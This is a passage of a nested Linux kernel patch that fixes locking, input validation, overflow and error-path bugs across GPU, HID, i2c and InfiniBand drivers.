+ 		str[len] = '\0';
+ 
++		mutex_lock(&gpu->lock);
++
+ 		if (param == MSM_PARAM_COMM) {
+ 			paramp = &ctx->comm;
+ 		} else {
+@@ -360,6 +362,8 @@ int adreno_set_param(struct msm_gpu *gpu, struct msm_file_private *ctx,
+ 		kfree(*paramp);
+ 		*paramp = str;
+ 
++		mutex_unlock(&gpu->lock);
++
+ 		return 0;
+ 	}
+ 	case MSM_PARAM_SYSPROF:
+diff --git a/drivers/gpu/drm/msm/msm_gpu.c b/drivers/gpu/drm/msm/msm_gpu.c
+index 021f4e29b613b..4f495eecc34ba 100644
+--- a/drivers/gpu/drm/msm/msm_gpu.c
++++ b/drivers/gpu/drm/msm/msm_gpu.c
+@@ -335,6 +335,8 @@ static void get_comm_cmdline(struct msm_gem_submit *submit, char **comm, char **
+ 	struct msm_file_private *ctx = submit->queue->ctx;
+ 	struct task_struct *task;
+ 
++	WARN_ON(!mutex_is_locked(&submit->gpu->lock));
++
+ 	/* Note that kstrdup will return NULL if argument is NULL: */
+ 	*comm = kstrdup(ctx->comm, GFP_KERNEL);
+ 	*cmd  = kstrdup(ctx->cmdline, GFP_KERNEL);
+diff --git a/drivers/gpu/drm/msm/msm_gpu.h b/drivers/gpu/drm/msm/msm_gpu.h
+index 58a72e6b14008..a89bfdc3d7f90 100644
+--- a/drivers/gpu/drm/msm/msm_gpu.h
++++ b/drivers/gpu/drm/msm/msm_gpu.h
+@@ -366,10 +366,18 @@ struct msm_file_private {
+ 	 */
+ 	int sysprof;
+ 
+-	/** comm: Overridden task comm, see MSM_PARAM_COMM */
++	/**
++	 * comm: Overridden task comm, see MSM_PARAM_COMM
++	 *
++	 * Accessed under msm_gpu::lock
++	 */
+ 	char *comm;
+ 
+-	/** cmdline: Overridden task cmdline, see MSM_PARAM_CMDLINE */
++	/**
++	 * cmdline: Overridden task cmdline, see MSM_PARAM_CMDLINE
++	 *
++	 * Accessed under msm_gpu::lock
++	 */
+ 	char *cmdline;
+ 
+ 	/**
+diff --git a/drivers/gpu/drm/panfrost/Kconfig b/drivers/gpu/drm/panfrost/Kconfig
+index 079600328be18..e6403a9d66ade 100644
+--- a/drivers/gpu/drm/panfrost/Kconfig
++++ b/drivers/gpu/drm/panfrost/Kconfig
+@@ -3,7 +3,8 @@
+ config DRM_PANFROST
+ 	tristate "Panfrost (DRM support for ARM Mali Midgard/Bifrost GPUs)"
+ 	depends on DRM
+-	depends on ARM || ARM64 || (COMPILE_TEST && !GENERIC_ATOMIC64)
++	depends on ARM || ARM64 || COMPILE_TEST
++	depends on !GENERIC_ATOMIC64    # for IOMMU_IO_PGTABLE_LPAE
+ 	depends on MMU
+ 	select DRM_SCHED
+ 	select IOMMU_SUPPORT
+diff --git a/drivers/gpu/drm/vc4/vc4_bo.c b/drivers/gpu/drm/vc4/vc4_bo.c
+index 231add8b8e127..ce0ea446bd707 100644
+--- a/drivers/gpu/drm/vc4/vc4_bo.c
++++ b/drivers/gpu/drm/vc4/vc4_bo.c
+@@ -179,6 +179,7 @@ static void vc4_bo_destroy(struct vc4_bo *bo)
+ 		bo->validated_shader = NULL;
+ 	}
+ 
++	mutex_destroy(&bo->madv_lock);
+ 	drm_gem_dma_free(&bo->base);
+ }
+ 
+@@ -394,7 +395,6 @@ struct drm_gem_object *vc4_create_object(struct drm_device *dev, size_t size)
+ {
+ 	struct vc4_dev *vc4 = to_vc4_dev(dev);
+ 	struct vc4_bo *bo;
+-	int ret;
+ 
+ 	if (WARN_ON_ONCE(vc4->is_vc5))
+ 		return ERR_PTR(-ENODEV);
+@@ -406,9 +406,7 @@ struct drm_gem_object *vc4_create_object(struct drm_device *dev, size_t size)
+ 	bo->madv = VC4_MADV_WILLNEED;
+ 	refcount_set(&bo->usecnt, 0);
+ 
+-	ret = drmm_mutex_init(dev, &bo->madv_lock);
+-	if (ret)
+-		return ERR_PTR(ret);
++	mutex_init(&bo->madv_lock);
+ 
+ 	mutex_lock(&vc4->bo_lock);
+ 	bo->label = VC4_BO_TYPE_KERNEL;
+diff --git a/drivers/gpu/drm/vmwgfx/vmwgfx_msg_arm64.h b/drivers/gpu/drm/vmwgfx/vmwgfx_msg_arm64.h
+old mode 100755
+new mode 100644
+diff --git a/drivers/hid/amd-sfh-hid/amd_sfh_client.c b/drivers/hid/amd-sfh-hid/amd_sfh_client.c
+index ab125f79408f2..1fb0f7105fb21 100644
+--- a/drivers/hid/amd-sfh-hid/amd_sfh_client.c
++++ b/drivers/hid/amd-sfh-hid/amd_sfh_client.c
+@@ -282,7 +282,7 @@ int amd_sfh_hid_client_init(struct amd_mp2_dev *privdata)
+ 		}
+ 		rc = mp2_ops->get_rep_desc(cl_idx, cl_data->report_descr[i]);
+ 		if (rc)
+-			return rc;
++			goto cleanup;
+ 		mp2_ops->start(privdata, info);
+ 		status = amd_sfh_wait_for_response
+ 				(privdata, cl_data->sensor_idx[i], SENSOR_ENABLED);
+diff --git a/drivers/hid/amd-sfh-hid/sfh1_1/amd_sfh_init.c b/drivers/hid/amd-sfh-hid/sfh1_1/amd_sfh_init.c
+index 4da2f9f62aba3..a1d6e08fab7d4 100644
+--- a/drivers/hid/amd-sfh-hid/sfh1_1/amd_sfh_init.c
++++ b/drivers/hid/amd-sfh-hid/sfh1_1/amd_sfh_init.c
+@@ -160,7 +160,7 @@ static int amd_sfh1_1_hid_client_init(struct amd_mp2_dev *privdata)
+ 		}
+ 		rc = mp2_ops->get_rep_desc(cl_idx, cl_data->report_descr[i]);
+ 		if (rc)
+-			return rc;
++			goto cleanup;
+ 
+ 		writel(0, privdata->mmio + AMD_P2C_MSG(0));
+ 		mp2_ops->start(privdata, info);
+diff --git a/drivers/hid/hid-betopff.c b/drivers/hid/hid-betopff.c
+index 467d789f9bc2d..25ed7b9a917e4 100644
+--- a/drivers/hid/hid-betopff.c
++++ b/drivers/hid/hid-betopff.c
+@@ -60,7 +60,6 @@ static int betopff_init(struct hid_device *hid)
+ 	struct list_head *report_list =
+ 			&hid->report_enum[HID_OUTPUT_REPORT].report_list;
+ 	struct input_dev *dev;
+-	int field_count = 0;
+ 	int error;
+ 	int i, j;
+ 
+@@ -86,19 +85,21 @@ static int betopff_init(struct hid_device *hid)
+ 	 * -----------------------------------------
+ 	 * Do init them with default value.
+ 	 */
++	if (report->maxfield < 4) {
++		hid_err(hid, "not enough fields in the report: %d\n",
++				report->maxfield);
++		return -ENODEV;
++	}
+ 	for (i = 0; i < report->maxfield; i++) {
++		if (report->field[i]->report_count < 1) {
++			hid_err(hid, "no values in the field\n");
++			return -ENODEV;
++		}
+ 		for (j = 0; j < report->field[i]->report_count; j++) {
+ 			report->field[i]->value[j] = 0x00;
+-			field_count++;
+ 		}
+ 	}
+ 
+-	if (field_count < 4) {
+-		hid_err(hid, "not enough fields in the report: %d\n",
+-				field_count);
+-		return -ENODEV;
+-	}
+-
+ 	betopff = kzalloc(sizeof(*betopff), GFP_KERNEL);
+ 	if (!betopff)
+ 		return -ENOMEM;
+diff --git a/drivers/hid/hid-bigbenff.c b/drivers/hid/hid-bigbenff.c
+index e8c5e3ac9fff1..e8b16665860d6 100644
+--- a/drivers/hid/hid-bigbenff.c
++++ b/drivers/hid/hid-bigbenff.c
+@@ -344,6 +344,11 @@ static int bigben_probe(struct hid_device *hid,
+ 	}
+ 
+ 	report_list = &hid->report_enum[HID_OUTPUT_REPORT].report_list;
++	if (list_empty(report_list)) {
++		hid_err(hid, "no output report found\n");
++		error = -ENODEV;
++		goto error_hw_stop;
++	}
+ 	bigben->report = list_entry(report_list->next,
+ 		struct hid_report, list);
+ 
+diff --git a/drivers/hid/hid-core.c b/drivers/hid/hid-core.c
+index bd47628da6be0..3e1803592bd4a 100644
+--- a/drivers/hid/hid-core.c
++++ b/drivers/hid/hid-core.c
+@@ -993,8 +993,8 @@ struct hid_report *hid_validate_values(struct hid_device *hid,
+ 		 * Validating on id 0 means we should examine the first
+ 		 * report in the list.
+ 		 */
+-		report = list_entry(
+-				hid->report_enum[type].report_list.next,
++		report = list_first_entry_or_null(
++				&hid->report_enum[type].report_list,
+ 				struct hid_report, list);
+ 	} else {
+ 		report = hid->report_enum[type].report_id_hash[id];
+diff --git a/drivers/hid/hid-ids.h b/drivers/hid/hid-ids.h
+index 82713ef3aaa64..c3735848ed5db 100644
+--- a/drivers/hid/hid-ids.h
++++ b/drivers/hid/hid-ids.h
+@@ -274,7 +274,6 @@
+ #define USB_DEVICE_ID_CH_AXIS_295	0x001c
+ 
+ #define USB_VENDOR_ID_CHERRY		0x046a
+-#define USB_DEVICE_ID_CHERRY_MOUSE_000C	0x000c
+ #define USB_DEVICE_ID_CHERRY_CYMOTION	0x0023
+ #define USB_DEVICE_ID_CHERRY_CYMOTION_SOLAR	0x0027
+ 
+diff --git a/drivers/hid/hid-quirks.c b/drivers/hid/hid-quirks.c
+index 0e9702c7f7d6c..be3ad02573de8 100644
+--- a/drivers/hid/hid-quirks.c
++++ b/drivers/hid/hid-quirks.c
+@@ -54,7 +54,6 @@ static const struct hid_device_id hid_quirks[] = {
+ 	{ HID_USB_DEVICE(USB_VENDOR_ID_CH, USB_DEVICE_ID_CH_FLIGHT_SIM_YOKE), HID_QUIRK_NOGET },
+ 	{ HID_USB_DEVICE(USB_VENDOR_ID_CH, USB_DEVICE_ID_CH_PRO_PEDALS), HID_QUIRK_NOGET },
+ 	{ HID_USB_DEVICE(USB_VENDOR_ID_CH, USB_DEVICE_ID_CH_PRO_THROTTLE), HID_QUIRK_NOGET },
+-	{ HID_USB_DEVICE(USB_VENDOR_ID_CHERRY, USB_DEVICE_ID_CHERRY_MOUSE_000C), HID_QUIRK_ALWAYS_POLL },
+ 	{ HID_USB_DEVICE(USB_VENDOR_ID_CORSAIR, USB_DEVICE_ID_CORSAIR_K65RGB), HID_QUIRK_NO_INIT_REPORTS },
+ 	{ HID_USB_DEVICE(USB_VENDOR_ID_CORSAIR, USB_DEVICE_ID_CORSAIR_K65RGB_RAPIDFIRE), HID_QUIRK_NO_INIT_REPORTS | HID_QUIRK_ALWAYS_POLL },
+ 	{ HID_USB_DEVICE(USB_VENDOR_ID_CORSAIR, USB_DEVICE_ID_CORSAIR_K70RGB), HID_QUIRK_NO_INIT_REPORTS },
+diff --git a/drivers/hid/intel-ish-hid/ishtp/dma-if.c b/drivers/hid/intel-ish-hid/ishtp/dma-if.c
+index 40554c8daca07..00046cbfd4ed0 100644
+--- a/drivers/hid/intel-ish-hid/ishtp/dma-if.c
++++ b/drivers/hid/intel-ish-hid/ishtp/dma-if.c
+@@ -104,6 +104,11 @@ void *ishtp_cl_get_dma_send_buf(struct ishtp_device *dev,
+ 	int required_slots = (size / DMA_SLOT_SIZE)
+ 		+ 1 * (size % DMA_SLOT_SIZE != 0);
+ 
++	if (!dev->ishtp_dma_tx_map) {
++		dev_err(dev->devc, "Fail to allocate Tx map\n");
++		return NULL;
++	}
++
+ 	spin_lock_irqsave(&dev->ishtp_dma_tx_lock, flags);
+ 	for (i = 0; i <= (dev->ishtp_dma_num_slots - required_slots); i++) {
+ 		free = 1;
+@@ -150,6 +155,11 @@ void ishtp_cl_release_dma_acked_mem(struct ishtp_device *dev,
+ 		return;
+ 	}
+ 
++	if (!dev->ishtp_dma_tx_map) {
++		dev_err(dev->devc, "Fail to allocate Tx map\n");
++		return;
++	}
++
+ 	i = (msg_addr - dev->ishtp_host_dma_tx_buf) / DMA_SLOT_SIZE;
+ 	spin_lock_irqsave(&dev->ishtp_dma_tx_lock, flags);
+ 	for (j = 0; j < acked_slots; j++) {
+diff --git a/drivers/i2c/busses/i2c-designware-common.c b/drivers/i2c/busses/i2c-designware-common.c
+index c023b691441ea..bceaf70f4e237 100644
+--- a/drivers/i2c/busses/i2c-designware-common.c
++++ b/drivers/i2c/busses/i2c-designware-common.c
+@@ -351,7 +351,8 @@ u32 i2c_dw_scl_hcnt(u32 ic_clk, u32 tSYMBOL, u32 tf, int cond, int offset)
+ 		 *
+ 		 * If your hardware is free from tHD;STA issue, try this one.
+ 		 */
+-		return DIV_ROUND_CLOSEST(ic_clk * tSYMBOL, MICRO) - 8 + offset;
++		return DIV_ROUND_CLOSEST_ULL((u64)ic_clk * tSYMBOL, MICRO) -
++		       8 + offset;
+ 	else
+ 		/*
+ 		 * Conditional expression:
+@@ -367,7 +368,8 @@ u32 i2c_dw_scl_hcnt(u32 ic_clk, u32 tSYMBOL, u32 tf, int cond, int offset)
+ 		 * The reason why we need to take into account "tf" here,
+ 		 * is the same as described in i2c_dw_scl_lcnt().
+ 		 */
+-		return DIV_ROUND_CLOSEST(ic_clk * (tSYMBOL + tf), MICRO) - 3 + offset;
++		return DIV_ROUND_CLOSEST_ULL((u64)ic_clk * (tSYMBOL + tf), MICRO) -
++		       3 + offset;
+ }
+ 
+ u32 i2c_dw_scl_lcnt(u32 ic_clk, u32 tLOW, u32 tf, int offset)
+@@ -383,7 +385,8 @@ u32 i2c_dw_scl_lcnt(u32 ic_clk, u32 tLOW, u32 tf, int offset)
+ 	 * account the fall time of SCL signal (tf).  Default tf value
+ 	 * should be 0.3 us, for safety.
+ 	 */
+-	return DIV_ROUND_CLOSEST(ic_clk * (tLOW + tf), MICRO) - 1 + offset;
++	return DIV_ROUND_CLOSEST_ULL((u64)ic_clk * (tLOW + tf), MICRO) -
++	       1 + offset;
+ }
+ 
+ int i2c_dw_set_sda_hold(struct dw_i2c_dev *dev)
+diff --git a/drivers/i2c/busses/i2c-designware-platdrv.c b/drivers/i2c/busses/i2c-designware-platdrv.c
+index ba043b5473936..74182db03a88b 100644
+--- a/drivers/i2c/busses/i2c-designware-platdrv.c
++++ b/drivers/i2c/busses/i2c-designware-platdrv.c
+@@ -351,13 +351,11 @@ static int dw_i2c_plat_probe(struct platform_device *pdev)
+ 
+ 	if (dev->flags & ACCESS_NO_IRQ_SUSPEND) {
+ 		dev_pm_set_driver_flags(&pdev->dev,
+-					DPM_FLAG_SMART_PREPARE |
+-					DPM_FLAG_MAY_SKIP_RESUME);
++					DPM_FLAG_SMART_PREPARE);
+ 	} else {
+ 		dev_pm_set_driver_flags(&pdev->dev,
+ 					DPM_FLAG_SMART_PREPARE |
+-					DPM_FLAG_SMART_SUSPEND |
+-					DPM_FLAG_MAY_SKIP_RESUME);
++					DPM_FLAG_SMART_SUSPEND);
+ 	}
+ 
+ 	device_enable_async_suspend(&pdev->dev);
+@@ -419,21 +417,8 @@ static int dw_i2c_plat_prepare(struct device *dev)
+ 	 */
+ 	return !has_acpi_companion(dev);
+ }
+-
+-static void dw_i2c_plat_complete(struct device *dev)
+-{
+-	/*
+-	 * The device can only be in runtime suspend at this point if it has not
+-	 * been resumed throughout the ending system suspend/resume cycle, so if
+-	 * the platform firmware might mess up with it, request the runtime PM
+-	 * framework to resume it.
+-	 */
+-	if (pm_runtime_suspended(dev) && pm_resume_via_firmware())
+-		pm_request_resume(dev);
+-}
+ #else
+ #define dw_i2c_plat_prepare	NULL
+-#define dw_i2c_plat_complete	NULL
+ #endif
+ 
+ #ifdef CONFIG_PM
+@@ -483,7 +468,6 @@ static int __maybe_unused dw_i2c_plat_resume(struct device *dev)
+ 
+ static const struct dev_pm_ops dw_i2c_dev_pm_ops = {
+ 	.prepare = dw_i2c_plat_prepare,
+-	.complete = dw_i2c_plat_complete,
+ 	SET_LATE_SYSTEM_SLEEP_PM_OPS(dw_i2c_plat_suspend, dw_i2c_plat_resume)
+ 	SET_RUNTIME_PM_OPS(dw_i2c_plat_runtime_suspend, dw_i2c_plat_runtime_resume, NULL)
+ };
+diff --git a/drivers/infiniband/core/verbs.c b/drivers/infiniband/core/verbs.c
+index 26b021f43ba40..11b1c1603aeb4 100644
+--- a/drivers/infiniband/core/verbs.c
++++ b/drivers/infiniband/core/verbs.c
+@@ -2957,15 +2957,18 @@ EXPORT_SYMBOL(__rdma_block_iter_start);
+ bool __rdma_block_iter_next(struct ib_block_iter *biter)
+ {
+ 	unsigned int block_offset;
++	unsigned int sg_delta;
+ 
+ 	if (!biter->__sg_nents || !biter->__sg)
+ 		return false;
+ 
+ 	biter->__dma_addr = sg_dma_address(biter->__sg) + biter->__sg_advance;
+ 	block_offset = biter->__dma_addr & (BIT_ULL(biter->__pg_bit) - 1);
+-	biter->__sg_advance += BIT_ULL(biter->__pg_bit) - block_offset;
++	sg_delta = BIT_ULL(biter->__pg_bit) - block_offset;
+ 
+-	if (biter->__sg_advance >= sg_dma_len(biter->__sg)) {
++	if (sg_dma_len(biter->__sg) - biter->__sg_advance > sg_delta) {
++		biter->__sg_advance += sg_delta;
++	} else {
+ 		biter->__sg_advance = 0;
+ 		biter->__sg = sg_next(biter->__sg);
+ 		biter->__sg_nents--;
+diff --git a/drivers/infiniband/hw/hfi1/user_exp_rcv.c b/drivers/infiniband/hw/hfi1/user_exp_rcv.c
+index 186d302912606..b02f2f0809c81 100644
+--- a/drivers/infiniband/hw/hfi1/user_exp_rcv.c
++++ b/drivers/infiniband/hw/hfi1/user_exp_rcv.c
+@@ -23,18 +23,25 @@ static void cacheless_tid_rb_remove(struct hfi1_filedata *fdata,
+ static bool tid_rb_invalidate(struct mmu_interval_notifier *mni,
+ 			      const struct mmu_notifier_range *range,
+ 			      unsigned long cur_seq);
++static bool tid_cover_invalidate(struct mmu_interval_notifier *mni,
++			         const struct mmu_notifier_range *range,
++			         unsigned long cur_seq);
+ static int program_rcvarray(struct hfi1_filedata *fd, struct tid_user_buf *,
+ 			    struct tid_group *grp,
+ 			    unsigned int start, u16 count,
+ 			    u32 *tidlist, unsigned int *tididx,
+ 			    unsigned int *pmapped);
+-static int unprogram_rcvarray(struct hfi1_filedata *fd, u32 tidinfo,
+-			      struct tid_group **grp);
++static int unprogram_rcvarray(struct hfi1_filedata *fd, u32 tidinfo);
++static void __clear_tid_node(struct hfi1_filedata *fd,
++			     struct tid_rb_node *node);
+ static void clear_tid_node(struct hfi1_filedata *fd, struct tid_rb_node *node);
+ 
+ static const struct mmu_interval_notifier_ops tid_mn_ops = {
+ 	.invalidate = tid_rb_invalidate,
+ };
++static const struct mmu_interval_notifier_ops tid_cover_ops = {
++	.invalidate = tid_cover_invalidate,
++};
+ 
+ /*
+  * Initialize context and file private data needed for Expected
+@@ -253,53 +260,65 @@ int hfi1_user_exp_rcv_setup(struct hfi1_filedata *fd,
+ 		tididx = 0, mapped, mapped_pages = 0;
+ 	u32 *tidlist = NULL;
+ 	struct tid_user_buf *tidbuf;
++	unsigned long mmu_seq = 0;
+ 
+ 	if (!PAGE_ALIGNED(tinfo->vaddr))
+ 		return -EINVAL;
++	if (tinfo->length == 0)
++		return -EINVAL;
+ 
+ 	tidbuf = kzalloc(sizeof(*tidbuf), GFP_KERNEL);
+ 	if (!tidbuf)
+ 		return -ENOMEM;
+ 
++	mutex_init(&tidbuf->cover_mutex);
+ 	tidbuf->vaddr = tinfo->vaddr;
+ 	tidbuf->length = tinfo->length;
+ 	tidbuf->psets = kcalloc(uctxt->expected_count, sizeof(*tidbuf->psets),
+ 				GFP_KERNEL);
+ 	if (!tidbuf->psets) {
+-		kfree(tidbuf);
+-		return -ENOMEM;
++		ret = -ENOMEM;
++		goto fail_release_mem;
++	}
++
++	if (fd->use_mn) {
++		ret = mmu_interval_notifier_insert(
++			&tidbuf->notifier, current->mm,
++			tidbuf->vaddr, tidbuf->npages * PAGE_SIZE,
++			&tid_cover_ops);
++		if (ret)
++			goto fail_release_mem;
++		mmu_seq = mmu_interval_read_begin(&tidbuf->notifier);
+ 	}
+ 
+ 	pinned = pin_rcv_pages(fd, tidbuf);
+ 	if (pinned <= 0) {
+-		kfree(tidbuf->psets);
+-		kfree(tidbuf);
+-		return pinned;
++		ret = (pinned < 0) ? pinned : -ENOSPC;
++		goto fail_unpin;
+ 	}
+ 
+ 	/* Find sets of physically contiguous pages */
+ 	tidbuf->n_psets = find_phys_blocks(tidbuf, pinned);
+ 
+-	/*
+-	 * We don't need to access this under a lock since tid_used is per
+-	 * process and the same process cannot be in hfi1_user_exp_rcv_clear()
+-	 * and hfi1_user_exp_rcv_setup() at the same time.
+-	 */
++	/* Reserve the number of expected tids to be used. */
+ 	spin_lock(&fd->tid_lock);
+ 	if (fd->tid_used + tidbuf->n_psets > fd->tid_limit)
+ 		pageset_count = fd->tid_limit - fd->tid_used;
+ 	else
+ 		pageset_count = tidbuf->n_psets;
++	fd->tid_used += pageset_count;
+ 	spin_unlock(&fd->tid_lock);
+ 
+-	if (!pageset_count)
+-		goto bail;
++	if (!pageset_count) {
++		ret = -ENOSPC;
++		goto fail_unreserve;
++	}
+ 
+ 	ngroups = pageset_count / dd->rcv_entries.group_size;
+ 	tidlist = kcalloc(pageset_count, sizeof(*tidlist), GFP_KERNEL);
+ 	if (!tidlist) {
+ 		ret = -ENOMEM;
+-		goto nomem;
++		goto fail_unreserve;
+ 	}
+ 
+ 	tididx = 0;
+@@ -395,43 +414,78 @@ int hfi1_user_exp_rcv_setup(struct hfi1_filedata *fd,
+ 	}
+ unlock:
+ 	mutex_unlock(&uctxt->exp_mutex);
+-nomem:
+ 	hfi1_cdbg(TID, "total mapped: tidpairs:%u pages:%u (%d)", tididx,
+ 		  mapped_pages, ret);
+-	if (tididx) {
+-		spin_lock(&fd->tid_lock);
+-		fd->tid_used += tididx;
+-		spin_unlock(&fd->tid_lock);
+-		tinfo->tidcnt = tididx;
+-		tinfo->length = mapped_pages * PAGE_SIZE;
+-
+-		if (copy_to_user(u64_to_user_ptr(tinfo->tidlist),
+-				 tidlist, sizeof(tidlist[0]) * tididx)) {
+-			/*
+-			 * On failure to copy to the user level, we need to undo
+-			 * everything done so far so we don't leak resources.
+-			 */
+-			tinfo->tidlist = (unsigned long)&tidlist;
+-			hfi1_user_exp_rcv_clear(fd, tinfo);
+-			tinfo->tidlist = 0;
+-			ret = -EFAULT;
+-			goto bail;
++
++	/* fail if nothing was programmed, set error if none provided */
++	if (tididx == 0) {
++		if (ret >= 0)
++			ret = -ENOSPC;
++		goto fail_unreserve;
++	}
++
++	/* adjust reserved tid_used to actual count */
++	spin_lock(&fd->tid_lock);
++	fd->tid_used -= pageset_count - tididx;
++	spin_unlock(&fd->tid_lock);
++
++	/* unpin all pages not covered by a TID */
++	unpin_rcv_pages(fd, tidbuf, NULL, mapped_pages, pinned - mapped_pages,
++			false);
++
++	if (fd->use_mn) {
++		/* check for an invalidate during setup */
++		bool fail = false;
++
++		mutex_lock(&tidbuf->cover_mutex);
++		fail = mmu_interval_read_retry(&tidbuf->notifier, mmu_seq);
++		mutex_unlock(&tidbuf->cover_mutex);
++
++		if (fail) {
++			ret = -EBUSY;
++			goto fail_unprogram;
+ 		}
+ 	}
+ 
+-	/*
+-	 * If not everything was mapped (due to insufficient RcvArray entries,
+-	 * for example), unpin all unmapped pages so we can pin them nex time.
+-	 */
+-	if (mapped_pages != pinned)
+-		unpin_rcv_pages(fd, tidbuf, NULL, mapped_pages,
+-				(pinned - mapped_pages), false);
+-bail:
++	tinfo->tidcnt = tididx;
++	tinfo->length = mapped_pages * PAGE_SIZE;
++
++	if (copy_to_user(u64_to_user_ptr(tinfo->tidlist),
++			 tidlist, sizeof(tidlist[0]) * tididx)) {
++		ret = -EFAULT;
++		goto fail_unprogram;
++	}
++
++	if (fd->use_mn)
++		mmu_interval_notifier_remove(&tidbuf->notifier);
++	kfree(tidbuf->pages);
+ 	kfree(tidbuf->psets);
++	kfree(tidbuf);
+ 	kfree(tidlist);
++	return 0;
++
++fail_unprogram:
++	/* unprogram, unmap, and unpin all allocated TIDs */
++	tinfo->tidlist = (unsigned long)tidlist;
++	hfi1_user_exp_rcv_clear(fd, tinfo);
++	tinfo->tidlist = 0;
++	pinned = 0;		/* nothing left to unpin */
++	pageset_count = 0;	/* nothing left reserved */
++fail_unreserve:
++	spin_lock(&fd->tid_lock);
++	fd->tid_used -= pageset_count;
++	spin_unlock(&fd->tid_lock);
++fail_unpin:
++	if (fd->use_mn)
++		mmu_interval_notifier_remove(&tidbuf->notifier);
++	if (pinned > 0)
++		unpin_rcv_pages(fd, tidbuf, NULL, 0, pinned, false);
++fail_release_mem:
+ 	kfree(tidbuf->pages);
++	kfree(tidbuf->psets);
+ 	kfree(tidbuf);
+-	return ret > 0 ? 0 : ret;
++	kfree(tidlist);
++	return ret;
+ }
+ 
+ int hfi1_user_exp_rcv_clear(struct hfi1_filedata *fd,
+@@ -452,7 +506,7 @@ int hfi1_user_exp_rcv_clear(struct hfi1_filedata *fd,
+ 
+ 	mutex_lock(&uctxt->exp_mutex);
+ 	for (tididx = 0; tididx < tinfo->tidcnt; tididx++) {
+-		ret = unprogram_rcvarray(fd, tidinfo[tididx], NULL);
++		ret = unprogram_rcvarray(fd, tidinfo[tididx]);
+ 		if (ret) {
+ 			hfi1_cdbg(TID, "Failed to unprogram rcv array %d",
+ 				  ret);
+@@ -706,6 +760,7 @@ static int set_rcvarray_entry(struct hfi1_filedata *fd,
+ 	}
+ 
+ 	node->fdata = fd;
++	mutex_init(&node->invalidate_mutex);
+ 	node->phys = page_to_phys(pages[0]);
+ 	node->npages = npages;
+ 	node->rcventry = rcventry;
+@@ -721,11 +776,6 @@ static int set_rcvarray_entry(struct hfi1_filedata *fd,
+ 			&tid_mn_ops);
+ 		if (ret)
+ 			goto out_unmap;
+-		/*
+-		 * FIXME: This is in the wrong order, the notifier should be
+-		 * established before the pages are pinned by pin_rcv_pages.
+-		 */
+-		mmu_interval_read_begin(&node->notifier);
+ 	}
+ 	fd->entry_to_rb[node->rcventry - uctxt->expected_base] = node;
+ 
+@@ -745,8 +795,7 @@ out_unmap:
+ 	return -EFAULT;
+ }
+ 
+-static int unprogram_rcvarray(struct hfi1_filedata *fd, u32 tidinfo,
+-			      struct tid_group **grp)
++static int unprogram_rcvarray(struct hfi1_filedata *fd, u32 tidinfo)
+ {
+ 	struct hfi1_ctxtdata *uctxt = fd->uctxt;
+ 	struct hfi1_devdata *dd = uctxt->dd;
+@@ -769,9 +818,6 @@ static int unprogram_rcvarray(struct hfi1_filedata *fd, u32 tidinfo,
+ 	if (!node || node->rcventry != (uctxt->expected_base + rcventry))
+ 		return -EBADF;
+ 
+-	if (grp)
+-		*grp = node->grp;
+-
+ 	if (fd->use_mn)
+ 		mmu_interval_notifier_remove(&node->notifier);
+ 	cacheless_tid_rb_remove(fd, node);
+@@ -779,23 +825,34 @@ static int unprogram_rcvarray(struct hfi1_filedata *fd, u32 tidinfo,
+ 	return 0;
+ }
+ 
+-static void clear_tid_node(struct hfi1_filedata *fd, struct tid_rb_node *node)
++static void __clear_tid_node(struct hfi1_filedata *fd, struct tid_rb_node *node)
+ {
+ 	struct hfi1_ctxtdata *uctxt = fd->uctxt;
+ 	struct hfi1_devdata *dd = uctxt->dd;
+ 
++	mutex_lock(&node->invalidate_mutex);
++	if (node->freed)
++		goto done;
++	node->freed = true;
++
+ 	trace_hfi1_exp_tid_unreg(uctxt->ctxt, fd->subctxt, node->rcventry,
+ 				 node->npages,
+ 				 node->notifier.interval_tree.start, node->phys,
+ 				 node->dma_addr);
+ 
+-	/*
+-	 * Make sure device has seen the write before we unpin the
+-	 * pages.
+-	 */
++	/* Make sure device has seen the write before pages are unpinned */
+ 	hfi1_put_tid(dd, node->rcventry, PT_INVALID_FLUSH, 0, 0);
+ 
+ 	unpin_rcv_pages(fd, NULL, node, 0, node->npages, true);
++done:
++	mutex_unlock(&node->invalidate_mutex);
++}
++
++static void clear_tid_node(struct hfi1_filedata *fd, struct tid_rb_node *node)
++{
++	struct hfi1_ctxtdata *uctxt = fd->uctxt;
++
++	__clear_tid_node(fd, node);
+ 
+ 	node->grp->used--;
+ 	node->grp->map &= ~(1 << (node->rcventry - node->grp->base));
+@@ -854,10 +911,16 @@ static bool tid_rb_invalidate(struct mmu_interval_notifier *mni,
+ 	if (node->freed)
+ 		return true;
+ 
++	/* take action only if unmapping */
++	if (range->event != MMU_NOTIFY_UNMAP)
++		return true;
++
+ 	trace_hfi1_exp_tid_inval(uctxt->ctxt, fdata->subctxt,
+ 				 node->notifier.interval_tree.start,
+ 				 node->rcventry, node->npages, node->dma_addr);
+-	node->freed = true;
++
++	/* clear the hardware rcvarray entry */
++	__clear_tid_node(fdata, node);
+ 
+ 	spin_lock(&fdata->invalid_lock);
+ 	if (fdata->invalid_tid_idx < uctxt->expected_count) {
+@@ -887,6 +950,23 @@ static bool tid_rb_invalidate(struct mmu_interval_notifier *mni,
+ 	return true;
+ }
+ 
++static bool tid_cover_invalidate(struct mmu_interval_notifier *mni,
++			         const struct mmu_notifier_range *range,
++			         unsigned long cur_seq)
++{
++	struct tid_user_buf *tidbuf =
++		container_of(mni, struct tid_user_buf, notifier);
++
++	/* take action only if unmapping */
++	if (range->event == MMU_NOTIFY_UNMAP) {
++		mutex_lock(&tidbuf->cover_mutex);
++		mmu_interval_set_seq(mni, cur_seq);
++		mutex_unlock(&tidbuf->cover_mutex);
++	}
++
++	return true;
++}
++
+ static void cacheless_tid_rb_remove(struct hfi1_filedata *fdata,
+ 				    struct tid_rb_node *tnode)
+ {
+diff --git a/drivers/infiniband/hw/hfi1/user_exp_rcv.h b/drivers/infiniband/hw/hfi1/user_exp_rcv.h
+index 8c53e416bf843..f8ee997d0050e 100644
+--- a/drivers/infiniband/hw/hfi1/user_exp_rcv.h
++++ b/drivers/infiniband/hw/hfi1/user_exp_rcv.h
+@@ -16,6 +16,8 @@ struct tid_pageset {
+ };
+ 
+ struct tid_user_buf {
++	struct mmu_interval_notifier notifier;
++	struct mutex cover_mutex;
+ 	unsigned long vaddr;
+ 	unsigned long length;
+ 	unsigned int npages;
+@@ -27,6 +29,7 @@ struct tid_user_buf {
+ struct tid_rb_node {
+ 	struct mmu_interval_notifier notifier;
+ 	struct hfi1_filedata *fdata;
